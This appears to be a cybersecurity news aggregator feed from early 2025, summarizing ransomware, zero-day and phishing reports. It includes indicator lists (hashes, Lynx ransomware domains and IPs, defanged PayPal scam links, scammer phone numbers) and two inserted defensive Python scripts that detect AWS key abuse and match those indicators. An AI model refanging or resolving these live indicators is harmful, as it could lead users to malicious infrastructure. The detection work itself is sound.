    SHA-1 507b26054319ff31f275ba44ddc9d2b5037bd295 (Nov 28, 2024)
    SHA-1 e1fb7d15408988df39a80b8939972f7843f0e785 (Nov 28, 2024)
    SHA-1 83f00af43df650fda2c5b4a04a7b31790a8ad4cf (Nov 28, 2024)
    SHA-1 44a76b9546427627a8d88a650c1bed3f1cc0278c (Nov 28, 2024)
    SHA-1 eeafa71946e81d8fe5ebf6be53e83a84dcca50ba (Nov 28, 2024)
    SHA-1 763499b37aacd317e7d2f512872f9ed719aacae1 (Nov 28, 2024)
    SHA-1 3477a173e2c1005a81d042802ab0f22cc12a4d55 (Feb 02, 2025)
    SHA-1 90be89524b72f330e49017a11e7b8a257f975e9a (Nov 28, 2024)
    Domain-Name gfs302n515.userstorage.mega.co.nz (Nov 28, 2024)
    SHA-256 e67260804526323484f564eebeb6c99ed021b960b899ff788aed85bb7a9d75c3 (Aug 20, 2024)
    Lynx: Lynx is a double-extortion ransomware group that has been very active lately, displaying many victimized companies on their website. IOCs (Type, Value, Last Observation Date):
    MD5 e488d51793fec752a64b0834defb9d1d (Sep 08, 2024)
    Domain-Name lynxback.pro (Sep 08, 2024)
    Domain-Name lynxbllrfr5262yvbgtqoyq76s7mpztcqkv6tjjxgpilpma7nyoeohyd.onion (Sep 08, 2024)
    Domain-Name lynxblog.net (Sep 08, 2024)
    IPv4-Addr 185.68.93.122 (Sep 08, 2024)
    IPv4-Addr 185.68.93.233 (Sep 08, 2024)
    MD5 7e851829ee37bc0cf65a268d1d1baa7a (Feb 17, 2025)
    What's to Come in 2025? "


    Serbian student activist’s phone hacked using Cellebrite zero-day exploit

    exploits
    2025-03-03 https://securityaffairs.com/174822/breaking-news/serbian-student-activists-phone-hacked-using-cellebrite-zero-day-exploit.html
    Amnesty International reports that a Cellebrite zero-day exploit was used to unlock the Android smartphone of a Serbian activist. In a statement published on 25 February 2025, Cellebrite announced that it had blocked Serbia from using its solution after reports that police […] "

    Autosummary: (Pierluigi Paganini, March 03, 2025) Timeline from the Amnesty report: 2024-12-25 20:22:13, phone turned on again at police station; 2024-12-25 20:24:37, emulated USB device (consistent with Cellebrite Turbo Link) connected to phone. “The same vulnerabilities could also expose Linux computers and Linux-powered embedded devices to physical attacks, although there is no evidence that this exploit chain has been designed to target non-Android Linux devices,” continues Amnesty. "


    Microsoft links recent Microsoft 365 outage to buggy update

    exploits
    2025-03-03 https://www.bleepingcomputer.com/news/microsoft/microsoft-links-recent-microsoft-365-outage-to-buggy-update/
    Microsoft says a coding issue is behind a now-resolved Microsoft 365 outage over the weekend that affected Outlook and Exchange Online authentication. [...] "

    Autosummary: "


    Stop targeting Russian hackers, Trump administration orders US Cyber Command

    rusia-ucrania
    2025-03-03 https://www.bitdefender.com/en-us/blog/hotforsecurity/stop-targeting-russian-hackers-trump-administration-orders-us-cyber-command
    The Trump administration has told US Cyber Command and CISA to stop following or reporting on Russian cyber threats. Yes, Russia! That country everyone used to agree was home to lots of ransomware gangs and hackers. Hmmm... Read more in my article on the Hot for Security blog. "

    Autosummary: As The Guardian reports, recent statements from officials, including Liesyl Franz, deputy assistant secretary for international cybersecurity at the US state department, omitted any mention of Russia as a cybersecurity threat - focusing instead on China and Iran. "


    Hackers Exploit Paragon Partition Manager Driver Vulnerability in Ransomware Attacks

    exploits ransomware
    2025-03-03 https://thehackernews.com/2025/03/hackers-exploit-paragon-partition.html
    Threat actors have been exploiting a security vulnerability in Paragon Partition Manager's BioNTdrv.sys driver in ransomware attacks to escalate privileges and execute arbitrary code. The zero-day flaw (CVE-2025-0289) is part of a set of five vulnerabilities that was discovered by Microsoft, according to the CERT Coordination Center (CERT/CC). "These include arbitrary kernel memory mapping and "

    Autosummary: "These include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability," CERT/CC said. "


    ⚡ THN Weekly Recap: Alerts on Zero-Day Exploits, AI Breaches, and Crypto Heists

    exploits
    2025-03-03 https://thehackernews.com/2025/03/thn-weekly-recap-alerts-on-zero-day.html
    This week, a 23-year-old Serbian activist found themselves at the crossroads of digital danger when a sneaky zero-day exploit turned their Android device into a target. Meanwhile, Microsoft pulled back the curtain on a scheme where cybercriminals used AI tools for harmful pranks, and a massive trove of live secrets was discovered, reminding us that even the tools we rely on can hide risky "

    Autosummary: This week's list includes — CVE-2025-27364 (MITRE Caldera), CVE-2025-24752 (Essential Addons for Elementor plugin), CVE-2025-27090 (Sliver), CVE-2024-34331 and its bypass (Parallels Desktop), CVE-2025-0690 (GRUB2), CVE-2024-12084, CVE-2024-12085, CVE-2024-12086, CVE-2024-12087, CVE-2024-12088 (rsync), CVE-2025-0475, CVE-2025-0555 (GitLab), CVE-2025-20111 (Cisco Nexus 3000 and 9000 Series Switches), CVE-2025-23363 (Siemens Teamcenter), CVE-2025-0514 (CVE-2025-0514), CVE-2025-1564 (SetSail Membership plugin), CVE-2025-1671 (Academist Membership plugin), CVE-2025-1638 (Alloggio Membership plugin), CVE-2024-12824 (Nokri – Job Board WordPress Theme), CVE-2024-9193 (WHMpress - WHMCS WordPress Integration Plugin), CVE-2024-8420 (DHVC Form plugin), CVE-2024-8425 (WooCommerce Ultimate Gift Card plugin), CVE-2025-25570 (Vue Vben Admin), CVE-2025-26943 (Jürgen Müller Easy Quotes plugin), and CVE-2025-1128 (Everest Forms – Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin).
    The company also noted that the threat actors behind the Contagious Interview campaign are actively targeting various cryptocurrency companies such as Stripe, Coinbase, Binance, Block, Ripple, Robinhood, Tether, Circle, Kraken, Gemini, Polygon, Chainalysis, KuCoin, eToro, Bitstamp, Bitfinex, Gate.io, Pantera Capital, Galaxy, Bitwise Asset Management, Bitwise Investments, BingX, Gauntlet, XY Labs, YouHodler, MatChain, Bemo, Barrowwise, Bondex, Halliday, Holidu, Hyphen Connect, and Windranger.
    Some of the other tools deployed included ISLAND for exploiting Solaris systems; SECONDDATE, a framework installed on edge devices to conduct network eavesdropping, MitM attacks, and code injection; NOPEN and FLAME SPRAY for remote access to compromised systems; CUNNING HERETICS, a lightweight implant for covert access to NSA communication channels; STOIC SURGEON, a backdoor targeting Linux, Solaris, JunOS, and FreeBSD systems; DRINKING TEA for credential harvesting; TOAST BREAD, a log manipulation tool that erased evidence of unauthorized access; and Shaver, a program to attack exposed SunOS servers for use as jump servers.
    "These misconfigurations exposed highly sensitive personal information, including employee photographs, full names, identification numbers, access card details, biometric data, vehicle plate numbers, and in some cases, even complete work schedules and facility access histories," Modat said.
    Targets of the individual's attacks spanned industries such as healthcare, retail, property investment, finance, e-commerce, logistics, technology, hospitality, insurance, and recruitment.
    Apple has released patches in iOS 18.2, iPadOS 17.7.3, 18.2, watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, Sonoma 14.7.2, Sequoia 15.2, and visionOS 2.2 to fix the vulnerability.
    Over 49,000 Misconfigured Access Management Systems Flagged — New research has uncovered more than 49,000 misconfigured access management systems (AMS) across the world, specifically in construction, healthcare, education, manufacturing, oil, and government sectors.
    "The attack is effective on Linux, Windows, and Android systems, and can be employed to track desktops, laptops, smartphones, and IoT devices."
    While Discord invite links were primarily found on forums like Nulled, Cracked, VeryLeaks, and DemonForums, Matrix and Element protocol based IDs were mainly found on drugs focused forums like RuTOR, RCclub, and BigBro. "


    U.S. Authorities recovered $31 Million Related to 2021 Uranium Finance cyber heist

    financial
    2025-03-03 https://securityaffairs.com/174845/cyber-crime/u-s-authorities-recovered-31-million-uranium-finance.html
    U.S. authorities have recovered $31 million in cryptocurrency stolen during the 2021 cyberattacks on Uranium Finance, a decentralized finance (DeFi) protocol built on Binance’s BNB Chain. The protocol operated as an automated market maker (AMM), similar to Uniswap, allowing […] "

    Autosummary: (Pierluigi Paganini, March 03, 2025) "


    US tariffs on Canada and Mexico will go ahead on Tuesday, says commerce chief

    latam
    2025-03-03 https://www.bbc.com/news/articles/cn48q3150dxo
    Howard Lutnick says the president's threat of blanket import taxes on his neighbours will proceed as planned. "

    Autosummary: Watch: Canada plans "strong" response if Trump imposes tariffs, says Trudeau. Mexico's president, Claudia Sheinbaum, appeared to send a message to Trump after the Lutnick interview when she said at a public event in the city of Colima that "Mexico has to be respected". "


    DHS says CISA will not stop monitoring Russian cyber threats

    rusia-ucrania
    2025-03-03 https://www.bleepingcomputer.com/news/security/dhs-says-cisa-will-not-stop-monitoring-russian-cyber-threats/
    The US Cybersecurity and Infrastructure Security Agency says that media reports about it being directed to no longer follow or report on Russian cyber activity are untrue, and its mission remains unchanged. [...] "

    Autosummary: "CISA's mission is to defend against all cyber threats to U.S. Critical Infrastructure, including from Russia," the US cyber agency posted to X. "There has been no change in our posture. "


    CISA tags Windows, Cisco vulnerabilities as actively exploited

    exploits
    2025-03-03 https://www.bleepingcomputer.com/news/security/cisa-tags-windows-and-cisco-vulnerabilities-as-actively-exploited/
    CISA has warned US federal agencies to secure their systems against attacks exploiting vulnerabilities in Cisco and Windows systems. [...] "

    Autosummary: "


    Hackers Exploit AWS Misconfigurations to Launch Phishing Attacks via SES and WorkMail

    financial exploits
    2025-03-03 https://thehackernews.com/2025/03/hackers-exploit-aws-misconfigurations.html
    Threat actors are targeting Amazon Web Services (AWS) environments to push out phishing campaigns to unsuspecting targets, according to findings from Palo Alto Networks Unit 42. The cybersecurity company is tracking the activity cluster under the name TGR-UNK-0011 (short for a threat group with unknown motivation), which it said overlaps with a group known as JavaGhost. TGR-UNK-0011 is known to "

    Autosummary: "JavaGhost obtained exposed long-term access keys associated with identity and access management (IAM) users that allowed them to gain initial access to an AWS environment via the command-line interface (CLI)," Kelley explained. "
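    An added example, not Unit 42's or the article's code: a scan over CloudTrail records for the pattern described above, an IAM user's long-term access key (AKIA... prefix; temporary STS keys start with ASIA) driving SES or WorkMail API calls from the AWS CLI. The list of SES/WorkMail API names to watch is an assumption chosen for the example, not a claim about the actor's exact call sequence, and the sample records are constructed, not real telemetry.

```python
"""Added example (not Unit 42 code): flag CloudTrail records where a
long-term IAM user key calls SES or WorkMail APIs. The watched API names
are an assumption for the example; the sample log lines are constructed."""
import json
from typing import Iterable, List, Optional

# Assumption for the example: SES/WorkMail calls worth alerting on when
# made with a long-term key. Any call could be flagged; this is a start.
WATCHED_EVENTS = {
    "ses.amazonaws.com": {"GetSendQuota", "VerifyEmailIdentity",
                          "CreateEmailIdentity", "SendEmail", "SendRawEmail",
                          "UpdateAccountSendingEnabled"},
    "workmail.amazonaws.com": {"CreateOrganization", "CreateUser",
                               "RegisterToWorkMail"},
}


def is_long_term_key(access_key_id: str) -> bool:
    """AKIA... is a long-term IAM user key; ASIA... is a temporary STS key."""
    return access_key_id.startswith("AKIA")


def flag_record(rec: dict) -> Optional[dict]:
    """Return a finding for one CloudTrail record, or None if it is benign."""
    ident = rec.get("userIdentity", {})
    key = ident.get("accessKeyId", "")
    source = rec.get("eventSource", "")
    name = rec.get("eventName", "")
    if ident.get("type") != "IAMUser" or not is_long_term_key(key):
        return None
    if name not in WATCHED_EVENTS.get(source, ()):
        return None
    return {
        "time": rec.get("eventTime"),
        "user": ident.get("userName"),
        "accessKeyId": key,
        "api": f"{source.split('.')[0]}:{name}",
        "sourceIP": rec.get("sourceIPAddress"),
        "cli": "aws-cli" in rec.get("userAgent", ""),
    }


def scan(lines: Iterable[str]) -> List[dict]:
    """Scan JSON Lines (one CloudTrail record per line); skip blank lines."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        hit = flag_record(json.loads(line))
        if hit:
            hits.append(hit)
    return hits


# Constructed sample, not real telemetry: four records, two of which match.
SAMPLE_LOG = """
{"eventTime":"2025-02-20T10:01:05Z","eventSource":"ses.amazonaws.com","eventName":"GetSendQuota","userIdentity":{"type":"IAMUser","userName":"deploy-bot","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10","userAgent":"aws-cli/2.15.0 Python/3.11.6 Linux/6.5.0"}
{"eventTime":"2025-02-20T10:01:09Z","eventSource":"ses.amazonaws.com","eventName":"SendEmail","userIdentity":{"type":"AssumedRole","userName":"mailer","accessKeyId":"ASIAEXAMPLE000000002"},"sourceIPAddress":"10.0.0.5","userAgent":"aws-sdk-java/2.20"}
{"eventTime":"2025-02-20T10:02:11Z","eventSource":"s3.amazonaws.com","eventName":"ListBuckets","userIdentity":{"type":"IAMUser","userName":"deploy-bot","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10","userAgent":"aws-cli/2.15.0 Python/3.11.6 Linux/6.5.0"}
{"eventTime":"2025-02-20T10:03:40Z","eventSource":"workmail.amazonaws.com","eventName":"CreateUser","userIdentity":{"type":"IAMUser","userName":"deploy-bot","accessKeyId":"AKIAEXAMPLE000000001"},"sourceIPAddress":"203.0.113.10","userAgent":"aws-cli/2.15.0 Python/3.11.6 Linux/6.5.0"}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

    The SES call made through an assumed role's temporary key is deliberately not flagged: the article's finding is about exposed long-term keys, and role sessions are the normal way a mailer workload would send. The S3 call by the same long-term key is not flagged either, but the same `accessKeyId` turning up in both findings is the pivot an analyst would use to scope the rest of that key's activity.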


    U.S. CISA adds Multiple Cisco Small Business RV Series Routers, Hitachi Vantara Pentaho BA Server, Microsoft Windows Win32k, and Progress WhatsUp Gold flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-03-03 https://securityaffairs.com/174853/security/u-s-cisa-adds-multiple-cisco-small-business-rv-series-routers-hitachi-vantara-pentaho-ba-server-microsoft-windows-win32k-and-progress-whatsup-gold-flaws-to-its-known-exploited-vulnerabilities.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Cisco Small Business RV Series Routers, Hitachi Vantara Pentaho BA Server, Microsoft Windows Win32k, and Progress WhatsUp Gold flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for […] "

    Autosummary: (Pierluigi Paganini, March 03, 2025) "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 35

    exploits
    2025-03-02 https://securityaffairs.com/174816/malware/security-affairs-malware-newsletter-round-35.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.
    DragonForce Ransomware Group is Targeting Saudi Arabia
    Massive Botnet Targets M365 with Stealthy Password Spraying Attacks
    Notorious Malware, Spam Host “Prospero” Moves to Kaspersky Lab
    ACRStealer Infostealer Exploiting Google Docs as C2
    #StopRansomware: Ghost (Cring) Ransomware
    […] "

    Autosummary: "


    U.S. recovers $31 million stolen in 2021 Uranium Finance hack

    financial
    2025-03-01 https://www.bleepingcomputer.com/news/cryptocurrency/us-recovers-31-million-stolen-in-2021-uranium-finance-hack/
    U.S. authorities recovered $31 million in cryptocurrency stolen in 2021 cyberattacks on Uranium Finance, a Binance Smart Chain-based DeFi protocol. [...] "

    Autosummary: "


    Ransomware gangs exploit Paragon Partition Manager bug in BYOVD attacks

    exploits
    2025-03-01 https://www.bleepingcomputer.com/news/security/ransomware-gangs-exploit-paragon-partition-manager-bug-in-byovd-attacks/
    Microsoft had discovered five Paragon Partition Manager BioNTdrv.sys driver flaws, with one used by ransomware gangs in zero-day attacks to gain SYSTEM privileges in Windows. [...] "

    Autosummary: The Paragon Partition Manager flaws discovered by Microsoft are: CVE-2025-0288 – Arbitrary kernel memory write caused by the improper handling of the "memmove" function, allowing attackers to write to kernel memory and escalate privileges. "Microsoft has observed threat actors (TAs) exploiting this weakness in BYOVD ransomware attacks, specifically using CVE-2025-0289 to achieve privilege escalation to SYSTEM level, then execute further malicious code," reads the CERT/CC bulletin. "


    Ransomware gangs exploit a Paragon Partition Manager BioNTdrv.sys driver zero-day

    exploits
    2025-03-01 https://securityaffairs.com/174789/cyber-crime/ransomware-gangs-paragon-partition-manager-biontdrv-sys-driver-zero-day-attacks.html
    Microsoft discovered five vulnerabilities in the Paragon Partition Manager BioNTdrv.sys driver and warns that one of them is being exploited by ransomware gangs as a zero-day. Paragon Partition Manager, available in Community and Commercial versions, manages hard drive […] "

    Autosummary: The flaws include arbitrary kernel memory mapping and write vulnerabilities, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability. (Pierluigi Paganini, March 01, 2025) "


    Bus crash kills at least 37 in Bolivia

    latam
    2025-03-01 https://www.bbc.com/news/articles/c4g02qx349do
    About 30 people were also injured after two buses collided early on Saturday, police say. "

    Autosummary: "


    PayPal’s “no-code checkout” abused by scammers

    financial
    2025-02-28 https://www.malwarebytes.com/blog/scams/2025/02/paypals-no-code-checkout-abused-by-scammers
    Malicious Google ads are redirecting PayPal users looking for assistance to fraudulent pay links embedding scammers' phone numbers. "

    Autosummary: Indicators of Compromise. Archived example: https://urlscan.io/result/3ea0654e-b446-4947-b926-b549624aa8b0
    Malicious pay links:
    hxxps[://]www[.]paypal[.]com/ncp/payment/8X7JHDGLK9Z46
    hxxps[://]www[.]paypal[.]com/ncp/payment/7QUEXNXR84X3L
    hxxps[://]www[.]paypal[.]com/ncp/payment/BHR4AMJAPWNZW
    hxxps[://]www[.]paypal[.]com/ncp/payment/FTJBPVUQFEJM6
    hxxps[://]www[.]paypal[.]com/ncp/payment/2X92RZVSG8MUJ
    hxxps[://]www[.]paypal[.]com/ncp/payment/D8X74WYAM3NJJ
    Scammers’ phone numbers:
    1-802[-]309-1950
    1-855[-]659-2102
    1-844[-]439-5160
    1-800[-]782-3849
    "
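    An added example, not Malwarebytes' code: ingesting the defanged IOCs published above and matching live URLs and phone numbers against them. The point it makes is the one that matters for blocking: the host in these links is the genuine www.paypal.com, so a domain blocklist or reputation lookup passes them, and the rule has to key on the `/ncp/payment/<code>` path. The refang conventions handled and the phone-number pattern are the example's own choices.

```python
"""Added example (not Malwarebytes code): refang the published IOCs and
match URLs and phone numbers against them at path/number level."""
import re
from typing import List, Optional
from urllib.parse import urlparse

# The six payment codes and four phone numbers from the IOC list above.
DEFANGED_LINKS = [
    "hxxps[://]www[.]paypal[.]com/ncp/payment/8X7JHDGLK9Z46",
    "hxxps[://]www[.]paypal[.]com/ncp/payment/7QUEXNXR84X3L",
    "hxxps[://]www[.]paypal[.]com/ncp/payment/BHR4AMJAPWNZW",
    "hxxps[://]www[.]paypal[.]com/ncp/payment/FTJBPVUQFEJM6",
    "hxxps[://]www[.]paypal[.]com/ncp/payment/2X92RZVSG8MUJ",
    "hxxps[://]www[.]paypal[.]com/ncp/payment/D8X74WYAM3NJJ",
]
DEFANGED_PHONES = ["1-802[-]309-1950", "1-855[-]659-2102",
                   "1-844[-]439-5160", "1-800[-]782-3849"]

NCP_PATH = re.compile(r"^/ncp/payment/([A-Z0-9]+)$")
# Loose North American number pattern (assumption for the example):
# matches "(802) 309-1950", "+1 855.659.2102", "8023091950".
PHONE_RE = re.compile(r"\+?1?[\s.-]?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")


def refang(ioc: str) -> str:
    """Undo common defanging: hxxp -> http, [://] -> ://, [.] -> ., [-] -> -."""
    out = re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)
    return out.replace("[://]", "://").replace("[.]", ".").replace("[-]", "-")


def normalize_phone(raw: str) -> str:
    """Reduce any formatting to the 10-digit NANP number (drops a leading 1)."""
    return re.sub(r"\D", "", refang(raw))[-10:]


def payment_code(url: str) -> Optional[str]:
    """Return the no-code-checkout code if url is an https www.paypal.com
    /ncp/payment/ link, else None."""
    parts = urlparse(url)
    if parts.scheme != "https" or parts.hostname != "www.paypal.com":
        return None
    m = NCP_PATH.match(parts.path)
    return m.group(1) if m else None


BAD_CODES = {c for c in (payment_code(refang(u)) for u in DEFANGED_LINKS) if c}
SCAM_PHONES = {normalize_phone(p) for p in DEFANGED_PHONES}


def is_known_scam_link(url: str) -> bool:
    """Path-level rule: block the specific pay-link codes, not paypal.com."""
    return payment_code(url) in BAD_CODES


def host_is_blocked(url: str, blocked_hosts) -> bool:
    """What a domain blocklist does; it returns False for these links."""
    return urlparse(url).hostname in blocked_hosts


def find_scam_phones(text: str) -> List[str]:
    """Scan free text (a pay-link page, an email) for the scammers' numbers,
    whatever formatting they were typed in."""
    found = [normalize_phone(m) for m in PHONE_RE.findall(text)]
    return [n for n in found if n in SCAM_PHONES]


if __name__ == "__main__":
    live = refang(DEFANGED_LINKS[0])
    print(live, "->", "scam" if is_known_scam_link(live) else "clean")
    print("domain blocklist catches it:", host_is_blocked(live, {"evil.example"}))
    print(find_scam_phones("Call support now at (802) 309-1950"))
```

    A code-level blocklist like this only covers the six links already seen; the durable control for a mail or web gateway is to treat any `paypal.com/ncp/payment/` link that arrives via an ad or unsolicited message as suspect, since a legitimate PayPal support path never needs one.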


    China-linked threat actors stole 10% of Belgian State Security Service (VSSE)’s staff emails

    government
    2025-02-28 https://securityaffairs.com/174743/intelligence/china-linked-threat-actors-stole-10-of-belgian-state-security-service-vsse-emails.html
    Belgian authorities are investigating China-linked hackers for breaching the State Security Service (VSSE) and stealing 10% of its staff emails from 2021 to May 2023. The Belgian federal prosecutor’s office is probing the possible breach. The hackers had access to the VSSE’s email server between 2021 and […] "

    Autosummary: (Pierluigi Paganini, February 28, 2025) At the end of July 2023, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an alert on a malware variant, tracked as SUBMARINE Backdoor, that was employed in attacks exploiting the flaw CVE-2023-2868 in Barracuda Email Security Gateway (ESG) appliances. “Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” "


    Microsoft Exposes LLMjacking Cybercriminals Behind Azure AI Abuse Scheme

    ciber
    2025-02-28 https://thehackernews.com/2025/02/microsoft-exposes-llmjacking.html
    Microsoft on Thursday unmasked four of the individuals that it said were behind an Azure Abuse Enterprise scheme that involves leveraging unauthorized access to generative artificial intelligence (GenAI) services in order to produce offensive and harmful content. The campaign, called LLMjacking, has targeted various AI offerings, including Microsoft's Azure OpenAI Service. The tech giant is "

    Autosummary: "


    Lloyds Bank says app issues fixed after payday IT issue

    financial
    2025-02-28 https://www.bbc.com/news/articles/cz9nnz2eqzdo
    Technical issues are affecting UK banking app users on payday for the second-month running in 2025. "

    Autosummary: "This proves that now more than ever a strong bank branch network, as when outages happen, we need face to face banking," he told the BBC. "


    OT/ICS cyber threats escalate as geopolitical conflicts intensify

    industry
    2025-02-28 https://www.helpnetsecurity.com/2025/02/28/dragos-2025-ot-ics-cybersecurity-report/

    Ransomware attacks against industrial organizations surged by 87% over the past year, while new malware families designed specifically for OT environments emerged. These findings highlight a troubling trend: OT systems are increasingly becoming mainstream targets, and even sophisticated threat actors use relatively unsophisticated tactics to infiltrate and disrupt industrial operations. State-sponsored groups embed themselves in critical infrastructure, while hacktivists and cybercriminals exploit known vulnerabilities, weak remote access configurations, and exposed OT assets. A persistent lack … More

    The post OT/ICS cyber threats escalate as geopolitical conflicts intensify appeared first on Help Net Security.

    "

    Autosummary: Confirmed victims of BAUXITE are in the United States, Europe, Australia, and the Middle East in multiple critical infrastructure sectors, including energy (oil and natural gas, and electric), water and wastewater, food and beverage, and chemical manufacturing. It utilizes the same techniques as in previous years, setting up complex chains of network infrastructure to target, compromise, and steal compromising OT-relevant data (GIS data, OT network diagrams, OT operating instructions, etc.) from victim ICS organizations. This malware, attributed to the pro-Ukraine hacktivist group BlackJack, is designed to target industrial sensor networks for Moskollektor, a municipal organization that maintains Moscow’s communication system for a gas, water, and sewage network. Vulnerabilities carry risk of impact on industrial processes: in 2024, Dragos found that 70% of the vulnerabilities researched were deep within the ICS network, 39% could cause both a loss of view and a loss of control, and 22% of advisories were network-exploitable and perimeter-facing, rising from 16% in 2023. Other key findings: geopolitical conflicts fuel OT-centric cyber operations, as adversaries aligned with state-backed initiatives continued to launch cyber operations targeting critical infrastructure in Ukraine, Russia, and the Middle East, often as a direct extension of military conflicts. "


    MITRE Caldera RCE vulnerability with public PoC fixed, patch ASAP! (CVE-2025–27364)

    exploits
    2025-02-28 https://www.helpnetsecurity.com/2025/02/28/mitre-caldera-rce-vulnerability-with-public-poc-cve-2025-27364/

    Users of the MITRE Caldera cyber security platform have been urged to plug a critical hole (CVE-2025–27364) that may allow unauthenticated attackers to achieve remote code execution. About MITRE Caldera MITRE Caldera is a platform built on the MITRE ATT&CK framework and is used by cybersecurity teams for adversary emulation, to evaluate detections and defensive tools, to train red and blue teamers, to test cyber ranges, and so on. It consists of a core system (including a … More

    The post MITRE Caldera RCE vulnerability with public PoC fixed, patch ASAP! (CVE-2025–27364) appeared first on Help Net Security.

    "

    Autosummary: It consists of a core system (including a command-and-control server with a REST API and a web interface) and plugins (agents, collections of TTPs, etc.) to expand its capabilities. "


    RDP: a Double-Edged Sword for IT Teams – Essential Yet Exploitable

    exploits
    2025-02-28 https://thehackernews.com/2025/02/rdp-double-edged-sword-for-it-teams.html
    Remote Desktop Protocol (RDP) is an amazing technology developed by Microsoft that lets you access and control another computer over a network. It’s like having your office computer with you wherever you go. For businesses, this means IT staff can manage systems remotely, and employees can work from home or anywhere, making RDP a true game-changer in today’s work environment. But here’s the "

    Autosummary: Why IT Teams Depend on RDP, Despite the Risks: more than 50 percent of Kaseya's small and medium-sized business (SMB) and Managed Service Provider (MSP) customers use RDP for daily operations due to its efficiency and flexibility. Reduces Costs and Downtime: IT teams can resolve technical issues remotely, eliminating travel expenses and delays. For businesses, especially SMBs and MSPs, this means a higher risk of serious issues like data breaches, ransomware infections, or unexpected downtime. By keeping your systems patched, limiting access, using multi-factor authentication, and employing advanced security solutions like Datto EDR, you can enjoy the flexibility of RDP without compromising your organization's security. "


    5,000 Phishing PDFs on 260 Domains Distribute Lumma Stealer via Fake CAPTCHAs

    financial
    2025-02-28 https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html
    Cybersecurity researchers have uncovered a widespread phishing campaign that uses fake CAPTCHA images shared via PDF documents hosted on Webflow's content delivery network (CDN) to deliver the Lumma stealer malware. Netskope Threat Labs said it discovered 260 unique domains hosting 5,000 phishing PDF files that redirect victims to malicious websites. "The attacker uses SEO to trick victims into "

    Autosummary: "The attacks were highly personalized, including non-public information, and the initial JavaScript would try to invoke a debugger breakpoint if it were being analyzed, detect a delay, and then abort the attack by redirecting to a benign website," Juniper Threat Labs said. "


    Qilin ransomware claims attack at Lee Enterprises, leaks stolen data

    exploits ransomware
    2025-02-28 https://www.bleepingcomputer.com/news/security/qilin-ransomware-claims-attack-at-lee-enterprises-leaks-stolen-data/
    The Qilin ransomware gang has claimed responsibility for the attack at Lee Enterprises that disrupted operations on February 3, leaking samples of data they claim was stolen from the company. [...] "

    Autosummary: "


    Serbian police used Cellebrite zero-day hack to unlock Android phones

    exploits
    2025-02-28 https://www.bleepingcomputer.com/news/security/serbian-police-used-cellebrite-zero-day-hack-to-unlock-android-phones/
    Serbian authorities have reportedly used an Android zero-day exploit chain developed by Cellebrite to unlock the device of a student activist in the country and attempt to install spyware. [...]

    Autosummary: The three flaws are: CVE-2024-53104 (USB Video Class exploit), CVE-2024-53197 (ALSA USB-sound driver exploit)


    Amnesty Finds Cellebrite’s Zero-Day Used to Unlock Serbian Activist’s Android Phone

    exploits
    2025-02-28 https://thehackernews.com/2025/02/amnesty-finds-cellebrites-zero-day.html
    A 23-year-old Serbian youth activist had their Android phone targeted by a zero-day exploit developed by Cellebrite to unlock the device, according to a new report from Amnesty International. "The Android phone of one student protester was exploited and unlocked by a sophisticated zero-day exploit chain targeting Android USB drivers, developed by Cellebrite," the international non-governmental

    Autosummary: "The Android phone of one student protester was exploited and unlocked by a sophisticated zero-day exploit chain targeting Android USB drivers, developed by Cellebrite," the international non-governmental organization said, adding that traces of the exploit were discovered in a separate case in mid-2024.


    Hottest cybersecurity open-source tools of the month: February 2025

    ciber
    2025-02-27 https://www.helpnetsecurity.com/2025/02/27/hottest-cybersecurity-open-source-tools-of-the-month-february-2025/

    This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Kunai: Open-source threat hunting tool for Linux Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. BadDNS: Open-source tool checks for subdomain takeovers BadDNS is an open-source Python DNS auditing tool designed to detect domain and subdomain takeovers of all types. Misconfig Mapper: Open-source tool to uncover security misconfigurations Misconfig Mapper … More

    The post Hottest cybersecurity open-source tools of the month: February 2025 appeared first on Help Net Security.




    Cybersecurity jobs available right now in Europe: February 27, 2025

    ciber
    2025-02-27 https://www.helpnetsecurity.com/2025/02/27/cybersecurity-jobs-available-right-now-in-europe-february-27-2025/

    The post Cybersecurity jobs available right now in Europe: February 27, 2025 appeared first on Help Net Security.


    Autosummary: Cloud Cybersecurity Engineer – Fever | Spain | On-site. As a Cloud Cybersecurity Engineer, you will be focused on helping to prevent and protect Fever from security threats, vulnerabilities and weaknesses that can potentially lead to security incidents by proactively testing, implementing and improving the security of our cloud services, applications and infrastructure, ensuring they remain resilient against evolving threats. AI/ML Security Engineer – Swift | Netherlands | Hybrid. As an AI/ML Security Engineer, you will design, develop, and implement security frameworks and strategies to protect AI/ML models and their use, and related data, applications and systems from adversarial attacks and other security threats. Cyber Security Engineer – Space Hellas | Greece | On-site. As a Cyber Security Engineer, you will design, implement, and manage cybersecurity solutions across on-premises, cloud, and hybrid environments. Senior Cybersecurity Analyst SOC – ZF Group | Poland | Hybrid. As a Senior Cybersecurity Analyst SOC, you will coordinate and lead incident response activities, including threat identification, containment, eradication, and recovery.


    Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers

    exploits
    2025-02-27 https://thehackernews.com/2025/02/bybit-hack-traced-to-safewallet-supply.html
